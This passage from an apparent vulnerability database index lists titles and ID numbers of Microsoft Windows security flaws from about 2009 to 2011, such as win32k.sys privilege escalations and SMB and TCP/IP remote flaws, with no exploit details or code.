Height Attribute Handling Remote Memory Corruption [77667] Microsoft Windows Active Directory Query Parsing Remote Overflow [77666] Microsoft Windows Kernel Exception Handler Local Privilege Escalation [77663] Microsoft Windows Object Linking and Embedding (OLE) Object File Handling Remote Code Execution [77662] Microsoft Windows CSRSS Device Event Message Parsing Local Privilege Escalation [77660] Microsoft Windows Media Player / Center DVR-MS File Handling Remote Memory Corruption [77620] Microsoft Windows IE Sandbox Restriction Bypass Local Privilege Escalation [77262] Microsoft Windows win32k.sys Driver Keyboard Layout File Handling Local DoS [77213] Microsoft Windows AppLocker Rule Weakness Local Access Restriction Bypass [76902] Microsoft Windows Active Directory LDAPS CRL Handling Weakness Authentication Bypass [76901] Microsoft Windows Mail / Windows Meeting Space Path Subversion Arbitrary DLL Injection Code Execution [76900] Microsoft Windows Malformed TrueType Font Parsing DoS [76899] Microsoft Windows TCP/IP Reference Counter Crafted UDP Packet Stream Remote Overflow [76843] Microsoft Windows Win32k TrueType Font Handling Privilege Escalation [76232] Microsoft Windows Ancillary Function Driver afd.sys Local Privilege Escalation [76231] Microsoft Windows Active Accessibility Path Subversion Arbitrary DLL Injection Code Execution [76221] Microsoft Windows win32k.sys Driver Use-after-free Driver Object Handling Arbitrary Code Execution [76220] Microsoft Windows win32k.sys Driver .fon Font File Handling Overflow [76219] Microsoft Windows win32k.sys Driver Type Translation TrueType Font File Handling DoS [76218] Microsoft Windows win32k.sys Driver NULL Dereference Unspecified Arbitrary Code Execution [76205] Microsoft Windows Media Center Path Subversion Arbitrary DLL Injection Code Execution [75473] Microsoft Windows Explorer shmedia.dll AVI File Handling Remote DoS [75444] Microsoft Windows WINS Loopback Interface Crafted Packet Local Privilege Escalation [75382] Microsoft Windows Shell Extensions Path Subversion Arbitrary DLL Injection Code Execution [75260] Microsoft Windows IPv6 Router Advertisement (RA) MitM Weakness [75199] Intel G41 Driver for Microsoft Windows Unspecified Page Handling DoS [75197] NVIDIA Geforce 310 Driver on Microsoft Windows Unspecified Page Handling DoS [75195] Microsoft Windows GPU Support Functionality Unspecified Page Handling DoS [74483] Microsoft Windows TCP/IP Stack (Tcpip.sys) QoS URL Request Parsing Remote DoS [74482] Microsoft Windows TCP/IP Stack (Tcpip.sys) ICMP Message Parsing Remote DoS [74408] Microsoft Windows Data Access Tracing Component Path Subversion Arbitrary DLL Injection Code Execution [74407] Microsoft Windows Kernel File Metadata Handling Remote DoS [74406] Microsoft Windows Remote Desktop Web Access Logon Page Unspecified XSS [74405] Microsoft Windows Remote Desktop Protocol RDP Packet Parsing Remote DoS [74402] Microsoft Windows Remote Access Service NDISTAPI Driver User Input Validation Weakness Local Privilege Escalation [74401] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Inter-Process Device Event Message Parsing Local Privilege Escalation [74400] Microsoft Windows DNS Service Non-Existent Domain Query Parsing Remote DoS [74399] Microsoft Windows DNS Service NAPTR Query Parsing Overflow [74265] Microsoft Windows CSRSS winsrv.dll SrvGetConsoleTitle() Function Type Casting Weakness Local DoS [73880] ArcSight Connector Appliance Windows Event Log SmartConnector Microsoft OS Version Field XSS [73799] Microsoft Windows Bluetooth Driver Object Handling Remote Code Execution [73796] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC() Function NULL Page Data Write Local Privilege Escalation [73795] Microsoft Windows CSRSS SrvWriteConsoleOutputString() Function Local Overflow [73794] Microsoft Windows CSRSS SrvWriteConsoleOutput() Function Local Overflow [73793] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand() Function Kernel Memory Access Local Privilege Escalation [73792] Microsoft Windows CSRSS AllocConsole() Function Multiple Console Object Orphaning Local Privilege Escalation [73791] Microsoft Windows win32k.sys Driver Function Argument Validation Unspecified Local Information Disclosure [73790] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1888) [73789] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1887) [73788] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1885) [73787] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1881) [73786] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1880) [73785] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1875) [73784] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1884) [73783] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1883) [73782] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1882) [73781] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1879) [73780] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1878) [73779] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1877) [73778] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1876) [73777] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1874) [73654] Microsoft Windows fxsst.dll Path Subversion DLL Injection Code Execution [73602] Microsoft Windows nsiproxy.sys Local DoS [72959] Microsoft Windows Object Linking and Embedding (OLE) Automation Remote Code Execution [72955] Microsoft Windows Ancillary Function Driver Local Privilege Escalation [72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS [72936] Microsoft Windows Server Service Crafted SMB Request Parsing Remote DoS [72935] Microsoft Windows MHTML Mime-Formatted Request Unspecified XSS [72930] Microsoft Windows Hyper-V VMBus vmswitch.sys Crafted Packet Cross-guest Local DoS [72929] Microsoft Windows Distributed File System (DFS) Referral Response Handling Remote DoS [72928] Microsoft Windows Distributed File System (DFS) Response Handling Memory Corruption Remote Code Execution [72919] Microsoft Windows OpenType Font (OTF) Pointer Validation Arbitrary Code Execution [72676] Microsoft Windows Kernel-mode GS Cookie Entropy Weakness [72672] Microsoft Windows AppFix systest.sdb Local DoS [72670] Microsoft Windows Server 2003 ActiveDirectory BROWSER ELECTION Remote Overflow [72234] Microsoft Windows WINS Service Failed Response Data Reuse Memory Corruption Remote Code Execution [71788] Microsoft Windows Messenger ActiveX Unspecified Remote Code Execution [71781] Microsoft Windows SMB Transaction Parsing Unspecified Remote Code Execution [71780] Microsoft Windows DNS Client Service LLMNR Query Processing Remote Code Execution [71779] Microsoft Windows/Office GDI+ (gdiplus.dll) EMF File Processing Overflow [71778] Microsoft Windows Wordpad Word 97 Converter sprmTTextFlow / sprmTSplit PRLs Parsing Memory Corruption [71776] Microsoft Windows OpenType Font (OTF) Driver Font Processing Overflow [71775] Microsoft Windows Fax Cover Page Editor fxscover.exe Text Element Handling Memory Corruption [71774] Microsoft Windows JScript / VBScript Engine Scripting Memory Reallocation Overflow [71773] Microsoft Windows Common Internet File System (CIFS) Malformed Browser Message Handling Overflow [71772] Microsoft Windows SMB Client Response Parsing Unspecified Remote Code Execution [71757] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1242) [71756] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1241) [71755] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1240) [71754] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1239) [71753] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1238) [71752] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1237) [71751] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1236) [71750] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1235) [71749] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1234) [71748] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0675) [71747] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0674) [71746] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0672) [71745] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0671) [71744] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0670) [71743] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0667) [71742] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0666) [71741] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0665) [71740] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0662) [71739] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1233) [71738] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1232) [71737] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1231) [71736] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1230) [71735] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1229) [71734] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1228) [71732] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1227) [71731] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1226) [71730] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1225) [71729] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0677) [71728] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0676) [71727] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0673) [71671] Microsoft Windows afd.sys 120CFh IOCTL Handling Local DoS [71667] Microsoft Windows SetDllDirectory Function Binary Planting Protection Bypass [71016] Microsoft Windows Media Player / Center .dvr-ms File Handling Arbitrary Code Execution [71015] Microsoft Windows DirectShow Path Subversion Arbitrary DLL Injection Code Execution [71014] Microsoft Windows Remote Desktop Client Path Subversion Arbitrary DLL Injection Code Execution [70885] Microsoft Windows LSASS Authentication Request Privilege Escalation [70881] Microsoft Windows SMB Browser Election Request Server Name String Overflow [70835] Microsoft Windows Kerberos Authentication Downgrade Weakness [70834] Microsoft Windows Kerberos Unkeyed Checksum Hashing Mechanism Service Ticket Forgery [70827] Microsoft Windows JScript / VBScript Scripting Engine Memory Corruption Information Disclosure [70826] Microsoft Windows CSRSS Logoff Process Termination Local Information Disclosure [70825] Microsoft Windows Server Active Directory Server Principal Name (SPN) Handling Remote DoS [70823] Microsoft Windows Kernel Trace Event (WmiTraceMessageVa) Handling Integer Truncation Local Privilege Escalation [70819] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0087) [70818] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0086) [70817] Microsoft Windows Kernel Class Improper Pointer Validation Unspecified Local Privilege Escalation [70816] Microsoft Windows Kernel Window Class Pointer Confusion Unspecified Local Privilege Escalation [70814] Microsoft Windows Kernel Unspecified Memory Corruption Local Privilege Escalation [70693] Microsoft Windows MHTML Protocol Handler MIME Formatted Request XSS [70689] Microsoft Windows USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution [70390] Microsoft Windows IPv6 Stack Neighbor Discovery Router Advertisement Message Saturation Remote DoS [70263] Microsoft Windows Bitmap Thumbnail shimgvw.dll CreateSizedDIBSECTION() Function biClrUsed Parameter Overflow [70126] Microsoft Windows Fax Cover Page Editor CDrawPoly::Serialize() Function Overflow [70000] Microsoft Windows Remote Access Phonebook (rasphone.exe) Path Subversion Arbitrary EXE Injection Code Execution [69824] Microsoft Windows Consent User Interface Local Privilege Escalation [69823] Microsoft Windows Routing and Remote Access NDProxy Unspecified Local Code Execution [69822] Microsoft Windows OpenType Font Driver CMAP Table Parsing Arbitrary Code Execution [69821] Microsoft Windows OpenType Font Driver Pointer Handling Double-free Arbitrary Code Execution [69820] Microsoft Windows OpenType Font Driver Index Array Unspecified Code Execution [69818] Microsoft Windows Hyper-V VMBus Crafted Packet Local DoS [69816] Microsoft Windows BranchCache Path Subversion Arbitrary DLL Injection Code Execution [69802] Microsoft Windows win32k.sys Cursor Linking Unspecified Local Privilege Escalation [69801] Microsoft Windows win32k.sys WriteAV Unspecified Local Privilege Escalation [69800] Microsoft Windows win32k.sys Unspecified Double-free Local Privilege Escalation [69799] Microsoft Windows win32k.sys PFE Pointer Double-free Local Privilege Escalation [69798] Microsoft Windows win32k.sys Unspecified Memory Corruption Local Privilege Escalation [69797] Microsoft Windows win32k.sys Unspecified Local Overflow [69501] Microsoft Windows win32k.sys Driver GreEnableEUDC() Function Local Overflow [69465] Microsoft Windows win32k.sys NtGdiEnableEUDC Local Overflow Privilege Escalation [68946] Microsoft Windows DAO Object Library Path Subversion Arbitrary DLL Injection Code Execution [68933] Microsoft Windows Shell32.dll Environment Variable Expansion SetDllDirectory Function Bypass [68857] Microsoft Windows XP wscript.exe Path Subversion Arbitrary DLL Injection Code Execution [68560] Microsoft Windows SChannel TLSv1 Crafted Client Certificate Request DoS [68559] Microsoft Windows OpenType Font Parsing Unspecified Remote Code Execution [68558] Microsoft Windows OpenType Malformed Font Validation Remote Code Execution [68557] Microsoft Windows Media Player Reload Operation Object Deallocation Memory Corruption [68554] Microsoft Windows Server 2008 Shared Cluster Disks Addition Default Permission Weakness [68553] Microsoft Windows t2embed.dll Embedded OpenType Font Parsing hdmx Record Parsing Overflow [68552] Microsoft Windows win32k.sys Driver Keyboard Layout Loading Local Privilege Escalation [68551] Microsoft Windows win32k.sys Driver Window Class Data Validation Local Privilege Escalation [68550] Microsoft Windows Media Player Network Sharing Service RTSP Use-after-free Remote Code Execution [68549] Microsoft Windows Common Control Library (comctl32.dll) Third-party SVG Content Handling Overflow [68518] Microsoft Windows on 32-bit Task Scheduler Crafted Application Local Privilege Escalation [68517] Microsoft Windows on 32-bit win32k.sys Keyboard Layout Loading Local Privilege Escalation [67987] Microsoft Windows LSASS Implementation Malformed LDAP Message Handling Remote Overflow [67986] Microsoft Windows Client/Server Runtime Subsystem (CSRSS) Local Privilege Escalation [67985] Microsoft Windows MPEG-4 Codec Content Parsing Overflow [67983] Microsoft Windows WordPad Text Converters Document Parsing Memory Corruption [67784] Microsoft Windows Media Encoder Path Subversion Arbitrary DLL Injection Code Execution [67783] Microsoft Windows SDK for Windows 7 / .NET Framework 4 GraphEdit Path Subversion Arbitrary DLL Injection Code Execution [67722] Microsoft Windows Internet Connection Signup Wizard Path Subversion Arbitrary DLL Injection Code Execution [67600] Microsoft Windows Media Player Path Subversion Arbitrary DLL Injection Code Execution [67599] Microsoft Windows Live Messenger Path Subversion Arbitrary DLL Injection Code Execution [67553] Microsoft Windows Contacts Path Subversion Arbitrary DLL Injection Code Execution [67552] Microsoft Windows Internet Communication Settings Path Subversion Arbitrary DLL Injection Code Execution [67551] Microsoft Windows Indeo Codec (ac25_32.ax) Path Subversion Arbitrary DLL Injection Code Execution [67548] Microsoft Windows Vista BitLocker Drive Encryption Path Subversion Arbitrary DLL Injection Code Execution [67543] Microsoft Windows Movie Maker Path Subversion Arbitrary OCX Injection Code Execution [67535] Microsoft Windows Progman Group Converter Path Subversion Arbitrary DLL Injection Code Execution [67500] Microsoft Windows Live Mail Path Subversion Arbitrary DLL Injection Code Execution [67408] Microsoft Windows Ipv4SetEchoRequestCreate() Interruption DoS [67083] Microsoft Windows TAPI Server (TAPISRV) Service Isolation Bypass Local Privilege Escalation [67005] Microsoft Windows TCP/IP Implementation IppSortDestinationAddresses() Function Local Overflow [67004] Microsoft Windows Malformed IPv6 Extension Header Handling Remote Memory Corruption DoS [66990] Microsoft Windows Kernel Object ACL Validation SeObjectCreateSaclAccessBits() Local DoS [66989] Microsoft Windows Kernel Object Initialization Error Handling Local Privilege Escalation [66988] Microsoft Windows Kernel Thread Creation Handling NtCreateThread() Local Privilege Escalation [66987] Microsoft Windows SChannel Malformed Certificate Request Remote Code Execution [66986] Microsoft Windows Movie Maker Imported Projector File (.MSWMM) String Parsing Overflow [66985] Microsoft Windows MPEG Layer-3 Audio Stream Decoding Overflow [66984] Microsoft Windows iccvid.dll VIDC (Cinepak) Codec Decompression Arbitrary Code Execution [66983] Microsoft Windows win32k.sys Driver xxxCreateWindowsEx hParent Value Handling Local Privilege Escalation [66982] Microsoft Windows win32k.sys Driver User Mode Input Unspecified Local Privilege Escalation [66981] Microsoft Windows win32k.sys Driver User Mode Copy Memory Allocation Local Privilege Escalation [66979] Microsoft Windows win32k.sys Driver GreStretchBltInternal() Handling Local DoS [66978] Microsoft Windows Tracing Feature for Services Registry String Handling Memory Corruption Local Privilege Escalation [66977] Microsoft Windows Tracing Feature for Services Registry Key ACL Local Privilege Escalation [66976] Microsoft Windows SMB Server Compounded Request Handling Stack Exhaustion Remote DoS [66975] Microsoft Windows SMB Server Crafted Packet Handling Unspecified Remote DoS [66974] Microsoft Windows SMB Server SMB_COM_TRANSACTION2 Request Handling Remote Code Execution [66934] Microsoft Windows win32k.sys CreateDIBPalette() Function Local Overflow [66387] Microsoft Windows Shell LNK File Parsing Arbitrary Command Execution [66003] Microsoft Windows win32k.sys NtUserCheckAccessForIntegrityLevel Use-After-Free Local Privilege Escalation [66001] Microsoft Windows mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Local Pointer Disclosure [65529] Microsoft Windows Help and Support Center sysinfo/sysinfomain.htm svr Parameter XSS [65264] Microsoft Windows hcp:// Protocol Handler MPC::HexToNum() Function String Miscalculation Arbitrary Command Execution [65225] Microsoft Windows Kernel-Mode Driver Window Creation Local Privilege Escalation [65224] Microsoft Windows Kernel-Mode Driver Win32k.sys GetDCEx() Function Device Contexts (DC) Handling Local Privilege Escalation [65223] Microsoft Windows Kernel-Mode Driver TrueType Font Parsing Local Privilege Escalation [65222] Microsoft Windows MJPEG Media Decompression Unspecified Remote Code Execution [65221] Microsoft Windows Media Decompression Unspecified Remote Code Execution [65219] Microsoft Windows / Office COM Object Instantiation Validation Remote Code Execution [65217] Microsoft Windows OpenType Compact Font Format (CFF) Driver Privilege Escalation [64928] Microsoft Windows SMB Client Transaction Response Handling Memory Corruption (2010-0476) [64927] Microsoft Windows SMB Client Transaction SMB_COM_TRANSACTION2 Response Handling Memory Corruption [64926] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0477) [64925] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0269) [64731] Microsoft Windows Canonical Display Driver (cdd.dll) Unspecified Memory Corruption [64530] Microsoft Outlook Express / Windows Mail STAT Response Overflow [64391] Microsoft Windows Group Policy Management Editor Account Password Removal Weakness [64341] Microsoft Windows Unspecified SMB Negotiation Remote DoS [64340] Microsoft Windows RRAS InterfaceAdjustVLSPointers Null Dereference Remote DoS [64058] Microsoft Windows win32k.sys SfnINSTRING() Local DoS [64057] Microsoft Windows win32k.sys Driver SfnLOGONNOTIFY() Function Local Privilege Escalation [63765] Microsoft Windows Media Player ActiveX fourCC Compression Code Codec Retrieval Arbitrary Code Execution [63749] Microsoft Windows MPEG Layer-3 Audio Decoder AVI File Handling Overflow [63747] Microsoft Windows ISATAP Component IPv6 Tunneled Packet IP Address Spoofing Weakness [63746] Microsoft Windows Authenticode Signature Verification Cabview Manipulation Privilege Escalation [63745] Microsoft Windows Authenticode WinVerifyTrust Signature Manipulation Validation Bypass [63739] Microsoft Windows SMTP / Exchange Server Malformed Command Sequence Remote Information Disclosure [63738] Microsoft Windows SMTP / Exchange Server DNS Mail Exchanger (MX) Resource Record Handling Remote DoS [63736] Microsoft Windows Kernel Symbolic Link Value Processing Unspecified Local DoS [63735] Microsoft Windows Kernel Exception Handling Unspecified Local DoS [63733] Microsoft Windows Kernel Registry Link Symbolic Link Extraction Local Privilege Escalation [63732] Microsoft Windows Kernel Malformed Image Handling Local DoS [63731] Microsoft Windows Kernel Registry Hive Symbolic Link Creation Local Privilege Escalation [63730] Microsoft Windows Kernel Registry Key Validation Unspecified Local DoS [63729] Microsoft Windows Kernel Virtual Path Parsing Local DoS [63728] Microsoft Windows Unspecified Kernel System Call Registry Handling Local DoS [63726] Microsoft Windows Media Unicast Service Transport Packet Handling Remote Overflow [63468] Microsoft Windows ANI Parser BITMAPINFO Header Crafted biClrUsed Value DoS [63231] Microsoft Windows Media Player Crafted AVI File Colorspace Conversion Memory Corruption [62855] Microsoft Windows HTML Help Control ActiveX chm File Handling Arbitrary Code Execution [62811] Microsoft Windows Movie Maker / Producer IsValidWMToolsStream() Function Project File (.MSWMM) Handling Overflow [62756] Microsoft Windows VBScript MsgBox() Function helpfile Argument Arbitrary Command Execution [62660] Microsoft Windows Unspecified API Argument Validation Local DoS [62652] Microsoft Windows Media Player Crafted MPG File Handling Overflow DoS [62637] Microsoft Windows Malformed TCP SYN Packet Remote DoS (Blat) [62632] Microsoft Windows VBScript MsgBox() Function HLP File Arbitrary Command Execution [62259] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [62258] Microsoft Windows Kerberos Ticket-Granting-Ticket Renewal Request NULL Dereference Remote DoS [62257] Microsoft Windows DirectShow AVI File Decompression Overflow [62256] Microsoft Windows SMB Server Crafted Network Message Remote Code Execution [62255] Microsoft Windows SMB Server Crafted Packet Handling Remote DoS [62254] Microsoft Windows SMB Server Crafted Packet Handling NULL Dereference Remote DoS [62253] Microsoft Windows SMB Server NTLM Authentication Nonce Entropy Weakness [62252] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Session Termination Weakness Local Privilege Escalation [62251] Microsoft Windows Server 2008 Hyper-V Crafted Instruction Sequence DoS [62250] Microsoft Windows TCP/IP Stack ICMPv6 Router Advertisement Packet Handling Remote Code Execution [62249] Microsoft Windows TCP/IP Stack ESP Over UDP Header MDL Fragmentation Remote Code Execution [62248] Microsoft Windows TCP/IP Stack ICMPv6 Route Information Packet Handling Remote Code Execution [62247] Microsoft Windows TCP/IP Selective Acknowledgment (SACK) Value Handling Remote DoS [62245] Microsoft Windows Shell Handler ShellExecute API Crafted URL Arbitrary Command Execution [62244] Microsoft Windows SMB Client Negotiate Protocol Response Handling Remote Code Execution [62243] Microsoft Windows SMB Client Packet Handling Race Condition Remote Privilege Escalation [62242] Microsoft Windows Paint JPEG Image Decoding Overflow [61854] Microsoft Windows Virtual DOS Machine (VDM) Subsystem #GP Trap Handler (nt!KiTrap0D) Local Privilege Escalation [61676] Microsoft Windows Live Messenger msnmsgr.exe ActiveX (msgsc.14.0.8089.726.dll) ViewProfile Method MSN Messenger Session Remote DoS [61651] Microsoft Windows Embedded OpenType Font Engine LZCOMP Decompressor Font Handling Arbitrary Code Execution [61037] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4312) [61036] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4311) [60858] Microsoft Windows Intel Indeo32 Codec (ir32_32.dll) IV32 FourCC Code Handling Heap Corruption [60857] Microsoft Windows Indeo Codec Unspecified Memory Corruption [60856] Microsoft Windows Intel Indeo41 Codec IV41 Stream Video Decompression Overflow [60855] Microsoft Windows Intel Indeo41 Codec IV41 movi Record Handling Overflow [60836] Microsoft Windows Active Directory Federation Services (ADFS) Request Header Handling Remote Code Execution [60835] Microsoft Windows Active Directory Federation Services (ADFS) Single Sign-on Spoofing [60833] Microsoft Windows Internet Authentication Service Crafted MS-CHAP v2 Message Remote Authentication Bypass [60832] Microsoft Windows Internet Authentication Service Protected Extensible Authentication Protocol (PEAP) Message Handling Remote Memory Corruption [60831] Microsoft Windows Local Security Authority Subsystem (LSASS) ISAKMP Message Handling Resource Exhaustion Remote DoS [60368] Microsoft Windows Terminal Services msgina.dll Unrestricted Resource Lock Remote DoS [60329] Microsoft Windows 2000 NetBIOS Continuation Packet Remote DoS [60273] Microsoft Windows NT Virtual DOS Machine 16-bit Executable Permission Bypass Local Privilege Escalation [60225] Microsoft Windows XP System Restore Directory ACL Weakness Local Privilege Escalation [60210] Microsoft Windows Active Directory Malformed LDAP Client Request Remote DoS [60206] Microsoft Windows Fast User Switching (FUS) Arbitrary User Process Listing Disclosure [60145] Microsoft Windows NT cmd.exe CD Command Arbitrary Local Code Execution [60057] Microsoft Windows File Protection (WFP) Catalog File (.CAT) Modification Hash Code Comparison Bypass [59957] Microsoft Windows SMB Response Handling Remote DoS [59886] Microsoft Exchange Malformed Microsoft Remote Procedure Call (MSRPC) Remote DoS [59869] Microsoft Windows Win32k Table of Directory Entry Building Font Code Parsing Remote Code Execution [59868] Microsoft Windows Win32k GDI Kernel Component Unspecified Local Privilege Escalation [59867] Microsoft Windows Win32k Unspecified Kernel System Call Local Privilege Escalation [59865] Microsoft Windows Web Services on Devices API (WSDAPI) Message Header Handling Memory Corruption [59856] Microsoft Windows Active Directory Malformed LDAP Request Stack Exhaustion Remote DoS [59738] Microsoft Windows ZIP Filename Handling Overflow DoS [59736] Microsoft Windows Media Player (WMP) on Solaris Installation Permission Weakness Local Privilege Escalation [59734] Microsoft Windows Log Clearning Function Admin Notification Weakness [59733] Microsoft Windows 2000 Terminal Services Screensaver Screen Minimization Locking Weakness [59732] Microsoft Windows Screensaver Domain Account Lock Verification Local Brute Force Weakness [59731] Microsoft Windows 2000 DCOM Client Alter Context Request Remote Information Disclosure [59730] Microsoft Windows 2000 Terminal Services Disconnect Feature Local Privilege Escalation [59515] Microsoft Windows csrss.exe Command Prompt Input Manipulation Forced Reboot DoS [59514] Microsoft Windows 2000 Task Manager Uppercase Process Name Termination Weakness [59513] Microsoft Windows NT winnt/system32 Write Access Local DoS (NT4ALL) [59509] Microsoft Windows 2000 Encrypted File System Cleartext Backup File Local Disclosure [59347] Microsoft Windows SYSKEY Registry EFS Startup Key Disclosure [59346] Microsoft Windows 2000 Crafted TCP/UDP Traffic CPU Consumption Remote DoS [59340] Microsoft Windows NT Logon Box Account Name Disclosure [59333] Microsoft Windows NT Winlogon Key Local Shutdown DoS [59325] Microsoft Windows NT Scheduler Drive Mapping Permission Weakness Local Privilege Escalation [59264] Microsoft Windows Crafted Fragmented Packet Stream Remote DoS (Jolt) [59260] Microsoft Windows NT SNMP Agent Query Saturation Remote DoS [59250] Microsoft Windows NT Fragmented Packet Handling Remote DoS (ntfrag) [59241] Microsoft Windows CreateRemoteThread Function Arbitrary Writeable Process Termination DoS [58876] Microsoft Windows SMB Packet Command Value Handling Remote Code Execution [58875] Microsoft Windows SMBv2 Packet Handling Infinitie Loop Remote DoS [58862] Microsoft Windows LSASS Malformed NTLM Authentication Packets Remote Overflow DoS [58861] Microsoft Windows Kernel Exception Handler Unspecified Local DoS [58860] Microsoft Windows Kernel User Mode PE File Handling NULL Dereference Local Privilege Escalation [58859] Microsoft Windows Kernel 64-bit Value Conversion Truncation Local Privilege Escalation [58856] Microsoft Windows CryptoAPI X.509 Certificate Object Identifier Handling Overflow Spoofing Weakness [58855] Microsoft Windows CryptoAPI X.509 Certificate Common Name Null Truncation Spoofing [58854] Microsoft Windows Indexing Service ActiveX Memory Corruption Arbitrary Code Execution [58845] Microsoft Windows Media Runtime Compressed Audio File Handling Heap Corruption Arbitrary Code Execution [58844] Microsoft Windows Media Player ASF Runtime Voice Sample Rate Handling Arbitrary Code Execution [58843] Microsoft Windows Media Player ASF Handling Overflow [58786] Microsoft Windows User Profile Unloading Session Persistence Weakness [58785] Microsoft Windows MFC Component (MFC42u.dll) AfxOleSetEditMenu Function RTF Malformed OLE Object Handling Overflow [58656] Trend Micro ServerProtect for Windows EarthAgent.exe Multiple RPC Functions Remote Overflow [57806] Microsoft Windows Wireless LAN AutoConfig Service (wlansvc) Frame Parsing Arbitrary Code Execution [57803] Microsoft Windows Media MP3 File Handling Memory Corruption [57802] Microsoft Windows Media ASF Header Parsing Invalid Free Arbitrary Code Execution [57799] Microsoft Windows srv2.sys Kernel Driver SMB2 Malformed NEGOTIATE PROTOCOL REQUEST Remote DoS [57798] Microsoft Windows DHTML Editing Component ActiveX Arbitrary Code Execution [57797] Microsoft Windows TCP/IP Orphaned Connection Handling Remote DoS [57796] Microsoft Windows TCP/IP Packet State Information Handling Remote Code Execution [57795] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [57016] Microsoft Windows win32k.sys Embedded OpenType Font Handling DoS [56912] Microsoft Windows Terminal Services Client ActiveX Unspecified Overflow [56909] Microsoft Windows AVI Media File Parsing Unspecified Overflow [56908] Microsoft Windows Malformed AVI Header Parsing Arbitrary Code Execution [56904] Microsoft Windows Telnet NTLM Credential Reflection Remote Access [56902] Microsoft Windows Workstation Service NetrGetJoinInformation Function Local Memory Corruption Arbitrary Code Execution [56901] Microsoft Windows Message Queuing Service (MSMQ) mqac.sys IOCTL Request Parsing Local Privilege Escalation [56900] Microsoft Windows Internet Name Service (WINS) Network Packet Handling Remote Integer Overflow [56899] Microsoft Windows Internet Name Service (WINS) Push Request Handling Remote Overflow [56780] Microsoft Windows win32k.sys NtUserConsoleControl Function Memory Manipulation Local Privilege Escalation [56516] Microsoft Windows lpCmdLine Filename Whitespace Handling Weakness [56514] Microsoft Windows gzip Libraries Unspecified Remote Code Execution [56513] Microsoft Windows Autorun / NoDriveTypeAutoRun Registry Value Enforcement Weakness [55843] Microsoft Windows Embedded OpenType (EOT) Font Name Tables Parsing Overflow [55842] Microsoft Windows Embedded OpenType (EOT) Font Data Record Parsing Overflow [55645] Microsoft Windows 